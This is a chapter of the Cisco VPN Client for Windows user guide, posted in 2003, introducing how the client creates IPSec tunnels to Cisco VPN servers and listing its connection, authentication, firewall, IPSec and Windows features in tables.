Table of Contents
Understanding the Cisco VPN Client
How the VPN Client Works
VPN Client Features
Understanding the Cisco VPN Client
The Cisco VPN Client for Windows (referred to in this user guide as VPN Client) is software that runs on a Microsoft® Windows®-based PC. The VPN Client on a remote PC, communicating with a Cisco Easy VPN server on an enterprise network or with a service provider, creates a secure connection over the Internet. Through this connection you can access a private network as if you were an on-site user. Thus you have a Virtual Private Network (VPN). The server verifies that incoming connections have up-to-date policies in place before establishing them. Cisco IOS, VPN 3000 Series Concentrators, and PIX central-site servers can all terminate VPN connections from VPN Clients.
As a remote user (low speed or high speed), you first connect to the Internet. Then you use the VPN Client to securely access private enterprise networks through a Cisco VPN server that supports the VPN Client.
The VPN Client comprises the following applications, which you select from the Programs menu:
Figure 1-1 VPN Client Applications as Installed by the Install Shield Wizard
The applications are as follows:
- Help—Displays an online manual with instructions on using the applications.
- SetMTU—Lets you manually change the size of the maximum transmission unit (see the VPN Client Administrator Guide, Chapter 6.)
- VPN Client—Lets you configure connections to a VPN server, start connections, enroll for certificates to authenticate connections to VPN servers, and display events from the log.
- Uninstall VPN Client—Lets you safely remove the VPN Client software from your system and retain your connection and certificate configurations.
 |
Note You can install the VPN Client through either the InstallShield wizard or the Microsoft Installer.
If you install the VPN Client through the Microsoft Installer, the Programs menu shown in
Figure 1-1 does not contain the
Uninstall application.
|
How the VPN Client Works
The VPN Client works with a Cisco VPN server to create a secure connection, called a tunnel, between your computer and the private network. It uses the Internet Key Exchange (IKE) and Internet Protocol Security (IPSec) tunneling protocols to make and manage secure connections. Some of the steps include:
- Negotiating tunnel parameters—Addresses, algorithms, lifetime, and so on.
- Establishing tunnels according to the parameters.
- Authenticating users—Making sure users are who they say they are, by way of usernames, group names and passwords, and X.509 digital certificates.
- Establishing user access rights—Hours of access, connection time, allowed destinations, allowed protocols, and so on.
- Managing security keys for encryption and decryption.
- Authenticating, encrypting, and decrypting data through the tunnel.
For example, to use a remote PC to read e-mail at your organization, you connect to the Internet, then start the VPN Client and establish a secure connection through the Internet to your organization's private network. When you open your e-mail, the Cisco VPN server uses IPSec to encrypt the e-mail message. It then transmits the message through the tunnel to your VPN Client, which decrypts the message so you can read it on your remote PC. If you reply to the e-mail message, the VPN Client uses IPSec to process and return the message to the private network through the Cisco VPN server.
Connection Technologies
The VPN Client lets you use any of the following technologies to connect to the Internet:
- POTS (Plain Old Telephone Service)—Uses a dial-up modem to connect.
- ISDN (Integrated Services Digital Network)—May use a dial-up modem to connect.
- Cable—Uses a cable modem; always connected.
- DSL (Digital Subscriber Line)—Uses a DSL modem; always connected.
You can also use the VPN Client on a PC with a direct LAN connection.
VPN Client Features
The tables in the following sections describe the VPN Client features.
Table 1-1 lists the VPN Client main features.
Table 1-1 VPN Client Main Features
| Features
|
Description
|
Operating System
|
Windows 98, Windows NT, Windows ME, Windows 2000, Windows XP
|
Connection types
|
- async serial PPP
- Internet-attached Ethernet
|
Protocol
|
IP
|
Tunnel protocol
|
IPSec
|
User Authentication
|
- RADIUS
- RSA SecurID
- VPN server internal user list
- PKI digital certificates
- Smart cards
- NT Domain (Windows NT)
|
Program Features
The VPN Client supports the program features listed in Table 1-2.
Table 1-2 Program Features
| Program Feature
|
Description
|
On-line Help
|
- Complete browser-based context-sensitive Help
|
Servers Supported
|
- Cisco IOS devices that support Easy VPN server functionality
- VPN 3000 Series Concentrators
- Cisco PIX Firewall Series, Version 6.2 or later
|
Interface supported
|
- Graphical user interface
- Command line interface
|
Local LAN access
|
The ability to access resources on a local LAN while connected through a secure gateway to a central-site VPN server (if the central site grants permission).
|
Automatic VPN Client configuration option
|
The ability to import a configuration file.
|
Event logging
|
The VPN Client log collects events for viewing and analysis.
|
NAT Transparency (NAT-T)
|
Enables the VPN Client and the VPN device to automatically detect when to use IPSec over UDP to work properly in Port Address Translation (PAT) environments.
|
Update of centrally controlled backup server list
|
The VPN Client learns the backup VPN server list when the connection is established. This feature is configured on the VPN device and pushed to the VPN Client. The backup servers for each connection entry are listed on the Backup Servers tab.
|
Set MTU size
|
The VPN Client automatically sets a maximum transmission unit (MTU) size that is optimal for your environment. However, you can also set the MTU size manually. For information on adjusting the MTU size, see the VPN Client Administrator Guide.
|
Support for Dynamic DNS (DDNS hostname population)
|
The VPN Client sends its hostname to the VPN device when the connection is established. If this occurs, the VPN device can send the hostname in a DHCP request. This causes the DNS server to update its database to include the new hostname and VPN Client address.
|
Application Launcher
|
The ability to launch an application or a third-party dialer from the VPN Client.
|
Uninstall package (InstallShield)
|
Automatic uninstall of the 5000 VPN Client software with the InstallShield installation package.
|
Automatic dialup connection
|
Automatic connection by way of Microsoft Dial-Up Networking or any other third-party remote-access dialer
|
Notifications
|
Software update notifications from the VPN server upon connection.
|
Launching from notification
|
Ability to launch a location site containing upgrade software from a VPN server notification.
|
Auto initiation
|
The ability to automatically initiate secure wireless VPN connections seamlessly.
|
Virtual adapter
|
Available on Windows 2000 and Windows XP, this software-only driver acts as a valid interface in the system to solve application incompatibly problems.
|
Alerts (Delete with reason)
|
The VPN Client can display to the user the reason for a VPN 3000 Concentrator-initiated disconnection, if that information is available. If the VPN 3000 Concentrator (Release 4.0) disconnects the VPN Client and tears down the tunnel, the VPN Client displays a pop-up window showing the reason for the disconnect and also logs a message to the Notifications log and the IPSec log file. For IPSec deletes that do not tear down the connection, an event message appears only in the log file.
|
Single-SA
|
The ability to support a single SA per VPN connection. Rather than creating a host-to-network security association (SA) pair for each split-tunneling network, this feature provides a host-to-ALL approach, creating one tunnel for all appropriate network traffic apart from whether split-tunneling is in use.
|
Coexistence with third-party client software
|
Compatibility with Microsoft, Nortel, Checkpoint, Intel, and other VPN clients -- the ability to use other VPN products while the VPN Client is installed.
This does not allow each VPN Client to make connections simultaneously.
|
Authentication Features
The VPN Client supports the authentication features listed in Table 1-3.
Table 1-3 Authentication Features
| Authentication Feature
|
Description
|
User authentication through VPN central-site device
|
- Internal through the VPN device's database
- RADIUS (Remote Authentication Dial-In User Service)
- NT Domain (Windows NT)
- RSA (formerly SDI) SecurID or SoftID
|
Certificate Authorities (CAs)
|
CAs that support PKI SCEP enrollment.
|
Entrust Entelligence
|
Ability to use Entrust Entelligence certificates
|
Certificate Management
|
Allows you to manage the certificates in the certificate stores.
|
Smart cards
|
Ability to authenticate using smart cards with certificates
|
Peer Certificate Distinguished Name Verification
|
Prevents a VPN Client from connecting to an invalid gateway by using a stolen but valid certificate and a hijacked IP address. If the attempt to verify the domain name of the peer certificate fails, the VPN Client connection also fails.
|
Firewall Features
The VPN Client supports the firewall features listed in Table 1-4.
Table 1-4 Firewall Features
| Firewall Feature
|
Description
|
Support for firewalls
|
- Cisco Integrated Firewall
- Cisco Intrusion Prevention Security Agent
- ZoneAlarmPro 2.6.3.57 and higher
- ZoneAlarm 2.6.3.57 and higher
- ZoneLabs Integrity 1.0 and higher
- BlackIce Agent and BlackIce Defender 2.5 and higher.
- Sygate Personal Firewall and Sygate Personal Firewall Pro, Version 5.0, Build 1175 and higher
|
Centralized Protection Policy
|
- Support for firewall policies pushed to the VPN Client from a VPN Concentrator
|
Stateful Firewall
|
Command-line enable/disable Stateful Firewall
|
ICMP permission
|
Configurable on the VPN Client
|
IPSec Features
The VPN Client supports the IPSec features listed in Table 1-5
Table 1-5 IPSec Features
| IPSec Feature
|
Description
|
Tunnel Protocol
|
IPSec
|
Transparent tunneling
|
- IPSec over UDP for NAT and PAT
- IPSec over TCP for NAT, PAT, and firewalls
|
Key Management protocol
|
Internet Key Exchange (IKE)
|
IKE Keepalives
|
A tool for monitoring the continued presence of a peer and reporting the VPN Client's continued presence to the peer. This lets the VPN Client notify you when the peer is no longer present. Another type of keepalives keeps NAT ports alive.
|
Split tunneling
|
The ability to simultaneously direct packets over the Internet in clear text and encrypted through an IPSec tunnel. The VPN device supplies a list of networks to the VPN Client for tunneled traffic. You enable split tunneling and configure the network list on the VPN device.
|
Support for Split DNS
|
The ability to direct DNS packets in clear text over the Internet to domains served through an external DNS (serving your ISP) or through an IPSec tunnel to domains served by the corporate DNS. The VPN server supplies a list of domains to the VPN Client for tunneling packets to destinations in the private network. For example, a query for a packet destined for corporate.com would go through the tunnel to the DNS that serves the private network, while a query for a packet destined for myfavoritesearch.com would be handled by the ISP's DNS. This feature is configured on the VPN server (VPN concentrator) and enabled on the VPN Client by default. To use Split DNS, you must also have split tunneling configured.
|
LZS data compression
|
A feature that benefits modem users.
|
VPN Client IPSec Attributes
The VPN Client supports the IPSec attributes listed in Table 1-6.
Table 1-6 IPSec Attributes
| IPSec Attribute
|
Description
|
Main Mode and Aggressive Mode
|
Ways to negotiate phase one of establishing ISAKMP Security Associations (SAs)
|
Authentication algorithms
|
- HMAC (Hashed Message Authentication Coding) with MD5 (Message Digest 5) hash function
- HMAC with SHA-1 (Secure Hash Algorithm) hash function
|
Authentication Modes
|
- Preshared Keys
- X.509 Digital Certificates
|
Diffie-Hellman Groups
|
|
Encryption algorithms
|
- 56-bit DES (Data Encryption Standard)
- 168-bit Triple-DES
- AES 128-bit and 256-bit
|
Extended Authentication (XAUTH)
|
The capability of authenticating a user within IKE. This authentication is in addition to the normal IKE phase 1 authentication, where the IPSec devices authenticate each other. The extended authentication exchange within IKE does not replace the existing IKE authentication.
|
Mode Configuration
|
Also known as ISAKMP Configuration Method
|
Tunnel Encapsulation Modes
|
- IPSec over UDP (NAT/PAT)
- IPSec over TCP (NAT/PAT)
- IPSec over NAT-T
|
IP compression (IPCOMP) using LZS
|
Data compression algorithm
|
Windows Features Supported
The VPN Client supports the Windows NT, Windows 2000, and Windows XP features listed in Table 1-7.
Table 1-7 Windows NT Features
| Windows NT Feature
|
Description
|
Password expiration information
|
Password expiration information when authenticating through a RADIUS server that references an NT user database. When you log in, the VPN Concentrator sends a message that your password has expired and asks you to enter a new one and then confirm it. On pre-Release 3.5 VPN Clients, the prompt asks you to supply a PIN and to verify it. On a Release 3.5 or higher VPN Client, the prompt asks you to enter and verify a password.
|
Start before logon
|
The ability to establish a VPN connection before logging on to a Windows NT platform, which includes Windows NT 4.0, Windows 2000, and Windows XP systems.
|
Automatic VPN disconnect on logoff
|
The ability to enable or disable automatic disconnect when logging off a Windows NT platform. Disabling this feature allows for roaming profile synchronization.
|
Posted: Tue Apr 8 09:33:43 PDT 2003
All contents are Copyright © 1992--2002 Cisco Systems, Inc. All rights reserved.
Important Notices and Privacy Statement.
